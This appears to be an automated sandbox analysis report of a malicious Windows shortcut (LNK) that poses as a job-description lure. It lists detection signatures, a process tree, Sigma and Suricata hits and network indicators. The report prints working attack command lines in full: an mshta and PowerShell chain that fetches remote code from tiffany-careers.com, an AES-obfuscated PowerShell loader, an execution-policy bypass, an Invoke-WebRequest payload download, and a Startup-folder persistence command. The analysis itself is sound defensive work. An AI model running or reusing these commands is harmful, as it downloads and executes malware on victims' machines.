Windows Analysis Report
FzmtNV0vnG.lnk

Overview

General Information

Sample name: FzmtNV0vnG.lnk (renamed because original name is a hash value)
Original sample name: ac9d5bb32e4d1c1cf52bf17bfdd8cf7b.lnk
Analysis ID: 1579660
MD5: ac9d5bb32e4d1c1cf52bf17bfdd8cf7b
SHA1: b9c921613643e7c500783326483523e92e6ab016
SHA256: 4883c36a3b5c9d4f4c318312dce1058d722e8a378adb3e348203bc93f41540d6
Tags: lnk, user-abuse_ch

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Suricata IDS alerts for network traffic
Windows shortcut file (LNK) starts blacklisted processes
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Bypasses PowerShell execution policy
Contains functionality to create processes via WMI
Creates processes via WMI
Drops PE files to the user root directory
Drops PE files with a suspicious file extension
Powershell drops PE file
Sigma detected: Execution from Suspicious Folder
Sigma detected: Execution of Powershell Script in Public Folder
Sigma detected: Parent in Public Folder Suspicious Process
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Rare Remote Thread Creation By Uncommon Source Image
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Invoke-WebRequest Execution
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Process Created Via Wmic.EXE
Sigma detected: WScript or CScript Dropper
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Windows shortcut file (LNK) contains suspicious command line arguments
AV process strings found (often used to terminate AV products)
Adds / modifies Windows certificates
Binary contains a suspicious time stamp
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found

Classification

  • System is w10x64
  • WMIC.exe (PID: 6648 cmdline: "C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://tiffany-careers.com/baochuan1')" MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
    • conhost.exe (PID: 4592 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 4180 cmdline: powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://tiffany-careers.com/baochuan1') MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 2604 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 3556 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta.exe https://tiffany-careers.com/baochuan1" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • mshta.exe (PID: 1988 cmdline: "C:\Windows\system32\mshta.exe" https://tiffany-careers.com/baochuan1 MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
          • powershell.exe (PID: 2608 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg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function vxx ($xHDThLVi){return -split ($xHDThLVi -replace '..', '0x$& ')};$FMAPhot = vxx($ddg.SubString(0, 2048));$pBL = [System.Security.Cryptography.Aes]::Create();$pBL.Key = vxx($ddg.SubString(2048));$pBL.IV = New-Object byte[] 16;$KNBWNbH = $pBL.CreateDecryptor();$NjZFZrE = [System.String]::new($KNBWNbH.TransformFinalBlock($FMAPhot, 0,$FMAPhot.Length)); sal fd $NjZFZrE.Substring(3,3); fd $NjZFZrE.Substring(6) MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 6520 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • Acrobat.exe (PID: 6300 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\Job_Description.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
              • AcroCEF.exe (PID: 2276 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
                • AcroCEF.exe (PID: 7272 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2104 --field-trial-handle=1656,i,6298120100990453940,17586476426563717861,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
            • rMpqCJnPv.exe (PID: 7952 cmdline: "C:\Users\user\AppData\Roaming\rMpqCJnPv.exe" MD5: 7E279E8E3DCD0BCD240E36D7317924D3)
              • powershell.exe (PID: 7988 cmdline: powershell -Command "Invoke-WebRequest -Uri "https://tiffany-careers.com/gIpBYOi" -OutFile "C:\Users\Public\Guard.exe"" MD5: 04029E121A0CFA5991749937DD22A1D9)
                • conhost.exe (PID: 7996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • powershell.exe (PID: 7728 cmdline: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
                • conhost.exe (PID: 7744 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                • Guard.exe (PID: 7680 cmdline: "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3 MD5: 18CE19B57F43CE0A5AF149C96AECC685)
                  • cmd.exe (PID: 8112 cmdline: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
                    • conhost.exe (PID: 8096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchost.exe (PID: 3176 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • wscript.exe (PID: 7996 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • SwiftWrite.pif (PID: 2792 cmdline: "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G" MD5: 18CE19B57F43CE0A5AF149C96AECC685)
  • cleanup
No configs have been found
No yara matches

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems), Tim Shelton | Data: Command: "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3 , CommandLine: "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3 , CommandLine|base64offset|contains: , Image: C:\Users\Public\Guard.exe, NewProcessName: C:\Users\Public\Guard.exe, OriginalFileName: C:\Users\Public\Guard.exe, ParentCommandLine: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7728, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3 , ProcessId: 7680, ProcessName: Guard.exe
Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", CommandLine: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\rMpqCJnPv.exe" , ParentImage: C:\Users\user\AppData\Roaming\rMpqCJnPv.exe, ParentProcessId: 7952, ParentProcessName: rMpqCJnPv.exe, ProcessCommandLine: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", ProcessId: 7728, ProcessName: powershell.exe
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit, CommandLine: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit, CommandLine|base64offset|contains: rg, Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3 , ParentImage: C:\Users\Public\Guard.exe, ParentProcessId: 7680, ParentProcessName: Guard.exe, ProcessCommandLine: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit, ProcessId: 8112, ProcessName: cmd.exe
Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\system32\mshta.exe" https://tiffany-careers.com/baochuan1, CommandLine: "C:\Windows\system32\mshta.exe" https://tiffany-careers.com/baochuan1, CommandLine|base64offset|contains: , Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta.exe https://tiffany-careers.com/baochuan1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3556, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\mshta.exe" https://tiffany-careers.com/baochuan1, ProcessId: 1988, ProcessName: mshta.exe
Source: Threat created | Author: Perez Diego (@darkquassar), oscd.community | Data: EventID: 8, SourceImage: C:\Windows\System32\wscript.exe, SourceProcessId: 7996, StartAddress: 94D1BCC0, TargetImage: C:\Windows\System32\conhost.exe, TargetProcessId: 7996
Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", CommandLine: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\rMpqCJnPv.exe" , ParentImage: C:\Users\user\AppData\Roaming\rMpqCJnPv.exe, ParentProcessId: 7952, ParentProcessName: rMpqCJnPv.exe, ProcessCommandLine: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1", ProcessId: 7728, ProcessName: powershell.exe
Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: powershell -Command "Invoke-WebRequest -Uri "https://tiffany-careers.com/gIpBYOi" -OutFile "C:\Users\Public\Guard.exe"", CommandLine: powershell -Command "Invoke-WebRequest -Uri "https://tiffany-careers.com/gIpBYOi" -OutFile "C:\Users\Public\Guard.exe"", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\rMpqCJnPv.exe" , ParentImage: C:\Users\user\AppData\Roaming\rMpqCJnPv.exe, ParentProcessId: 7952, ParentProcessName: rMpqCJnPv.exe, ProcessCommandLine: powershell -Command "Invoke-WebRequest -Uri "https://tiffany-careers.com/gIpBYOi" -OutFile "C:\Users\Public\Guard.exe"", ProcessId: 7988, ProcessName: powershell.exe
Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg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function vxx ($xHDThLVi){return -split ($xHDThLVi -replace '..', '0x$& ')};$FMAPhot = vxx($ddg.SubString(0, 2048));$pBL = [System.Security.Cryptography.Aes]::Create();$pBL.Key = vxx($ddg.SubString(2048));$pBL.IV = New-Object byte[] 16;$KNBWNbH = $pBL.CreateDecryptor();$NjZFZrE = [System.String]::new($KNBWNbH.TransformFinalBlock($FMAPhot, 0,$FMAPhot.Length)); sal fd $NjZFZrE.Substring(3,3); fd $NjZFZrE.Substring(6), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg = '5FC32DF1C0FFAB04AD1461E41B34580CF686186BB175883500353248755372D1E74F294A259C979896FEA6271F154228B3BF0D6A9D0D9F6569B9D41A9A3D09A63BCE9C837BE004A6208D93ACB87F6C547277A8C3268B742B3EF6AEA9AEAFEE59C43BF887EB0182FB5943B2947D27E46DFAAD9FE12776123E736F027853F8BC8DFCF554869724A0AA804A9049D
Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://tiffany-careers.com/baochuan1')", CommandLine: "C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://tiffany-careers.com/baochuan1')", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\wbem\WMIC.exe, NewProcessName: C:\Windows\System32\wbem\WMIC.exe, OriginalFileName: C:\Windows\System32\wbem\WMIC.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://tiffany-careers.com/baochuan1')", ProcessId: 6648, ProcessName: WMIC.exe
Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , ProcessId: 7996, ProcessName: wscript.exe
Source: File created | Author: Florian Roth (Nextron Systems) | Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7988, TargetFilename: C:\Users\Public\Guard.exe
Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg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function vxx ($xHDThLVi){return -split ($xHDThLVi -replace '..', '0x$& ')};$FMAPhot = vxx($ddg.SubString(0, 2048));$pBL = [System.Security.Cryptography.Aes]::Create();$pBL.Key = vxx($ddg.SubString(2048));$pBL.IV = New-Object byte[] 16;$KNBWNbH = $pBL.CreateDecryptor();$NjZFZrE = [System.String]::new($KNBWNbH.TransformFinalBlock($FMAPhot, 0,$FMAPhot.Length)); sal fd $NjZFZrE.Substring(3,3); fd $NjZFZrE.Substring(6), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg = '5FC32DF1C0FFAB04AD1461E41B34580CF686186BB175883500353248755372D1E74F294A259C979896FEA6271F154228B3BF0D6A9D0D9F6569B9D41A9A3D09A63BCE9C837BE004A6208D93ACB87F6C547277A8C3268B742B3EF6AEA9AEAFEE59C43BF887EB0182FB5943B2947D27E46DFAAD9FE12776123E736F027853F8BC8DFCF554869724A0AA804A9049D
Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G", CommandLine: "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif, NewProcessName: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif, OriginalFileName: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif, ParentCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7996, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G", ProcessId: 2792, ProcessName: SwiftWrite.pif
Source: File created | Author: frack113, Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 2608, TargetFilename: C:\Users\user\AppData\Roaming\rMpqCJnPv.exe
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -Command "Invoke-WebRequest -Uri "https://tiffany-careers.com/gIpBYOi" -OutFile "C:\Users\Public\Guard.exe"", CommandLine: powershell -Command "Invoke-WebRequest -Uri "https://tiffany-careers.com/gIpBYOi" -OutFile "C:\Users\Public\Guard.exe"", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\rMpqCJnPv.exe" , ParentImage: C:\Users\user\AppData\Roaming\rMpqCJnPv.exe, ParentProcessId: 7952, ParentProcessName: rMpqCJnPv.exe, ProcessCommandLine: powershell -Command "Invoke-WebRequest -Uri "https://tiffany-careers.com/gIpBYOi" -OutFile "C:\Users\Public\Guard.exe"", ProcessId: 7988, ProcessName: powershell.exe
Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: powershell -Command "Invoke-WebRequest -Uri "https://tiffany-careers.com/gIpBYOi" -OutFile "C:\Users\Public\Guard.exe"", CommandLine: powershell -Command "Invoke-WebRequest -Uri "https://tiffany-careers.com/gIpBYOi" -OutFile "C:\Users\Public\Guard.exe"", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\rMpqCJnPv.exe" , ParentImage: C:\Users\user\AppData\Roaming\rMpqCJnPv.exe, ParentProcessId: 7952, ParentProcessName: rMpqCJnPv.exe, ProcessCommandLine: powershell -Command "Invoke-WebRequest -Uri "https://tiffany-careers.com/gIpBYOi" -OutFile "C:\Users\Public\Guard.exe"", ProcessId: 7988, ProcessName: powershell.exe
Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" , ProcessId: 7996, ProcessName: wscript.exe
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://tiffany-careers.com/baochuan1'), CommandLine: powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://tiffany-careers.com/baochuan1'), CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://tiffany-careers.com/baochuan1')", ParentImage: C:\Windows\System32\wbem\WMIC.exe, ParentProcessId: 6648, ParentProcessName: WMIC.exe, ProcessCommandLine: powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://tiffany-careers.com/baochuan1'), ProcessId: 4180, ProcessName: powershell.exe
Source: Process started | Author: vburov | Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 3176, ProcessName: svchost.exe

Data Obfuscation

Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Windows\SysWOW64\cmd.exe, ProcessId: 8112, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-23T07:11:35.553406+0100 | 2026434 | 1 | A Network Trojan was detected | 147.45.49.155 | 443 | 192.168.2.5 | 49704 | TCP
2024-12-23T07:11:49.698928+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 49714 | 147.45.49.155 | 443 | TCP

AV Detection

Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exe | ReversingLabs: Detection: 30%
Source: FzmtNV0vnG.lnk | Virustotal: Detection: 26%
Source: FzmtNV0vnG.lnk | ReversingLabs: Detection: 21%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.5% probability
Source: unknown | HTTPS traffic detected: 147.45.49.155:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 147.45.49.155:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 147.45.49.155:443 -> 192.168.2.5:49740 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 147.45.49.155:443 -> 192.168.2.5:49759 version: TLS 1.2
Source: Binary string: sethc.pdbGCTL source: mshta.exe, 00000006.00000003.2128979328.000002428AD54000.00000004.00000020.00020000.00000000.sdmp, baochuan1[1].6.dr
Source: Binary string: sethc.pdb source: baochuan1[1].6.dr
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exe | Code function: 15_2_00007FF7BB85C7C0 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exe | Code function: 15_2_00007FF7BB85BC70 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exe | Code function: 15_2_00007FF7BB8672A8 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exe | Code function: 15_2_00007FF7BB8671F4 FindFirstFileW,FindClose
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exe | Code function: 15_2_00007FF7BB85B7C0 FindFirstFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exe | Code function: 15_2_00007FF7BB822F50 FindFirstFileExW
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exe | Code function: 15_2_00007FF7BB86A4F8 FindFirstFileW,FindNextFileW,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exe | Code function: 15_2_00007FF7BB866428 FindFirstFileW,FindNextFileW,FindClose
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exe | Code function: 15_2_00007FF7BB86A350 FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exe | Code function: 15_2_00007FF7BB86A874 FindFirstFileW,Sleep,FindNextFileW,FindClose

Networking

Source: Network traffic | Suricata IDS: 2026434 - Severity 1 - ET MALWARE VBScript Redirect Style Exe File Download : 147.45.49.155:443 -> 192.168.2.5:49704
Source: global traffic | HTTP traffic detected: GET /Job_Description.pdf HTTP/1.1 | Host: tiffany-careers.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /rMpqCJnPv.exe HTTP/1.1 | Host: tiffany-careers.com
Source: global traffic | HTTP traffic detected: GET /ygUmFny.txt HTTP/1.1 | Host: tiffany-careers.com | Connection: Keep-Alive
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
